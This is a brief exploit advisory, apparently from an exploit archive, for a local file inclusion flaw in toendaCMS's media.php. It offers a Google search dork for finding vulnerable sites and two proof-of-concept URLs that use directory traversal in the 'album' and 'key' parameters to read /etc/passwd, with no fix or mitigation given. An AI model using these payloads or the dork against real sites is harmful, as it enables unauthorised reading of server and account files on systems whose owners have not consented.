toendaCMS suffers from a local file inclusion vulnerability.
cfa27594dce544149069606ee96212e6d3e43fd1b0ea6d67437daf4954d66b15
Local File Include in toendaCMS.
Vulnerable File : media.php
googleDork: "Powered by toendaCMS "
PoC:
http://site.com/media.php?album=1005bb&key=../../../../../../../../../../../../../etc/passwd
or
http://site.com/ media.php?album=../../../../../../../../../../../../..&key=/etc/passwd
_____
Found By MoHaJaLi
Greetz to Eddy_BAck0o
_____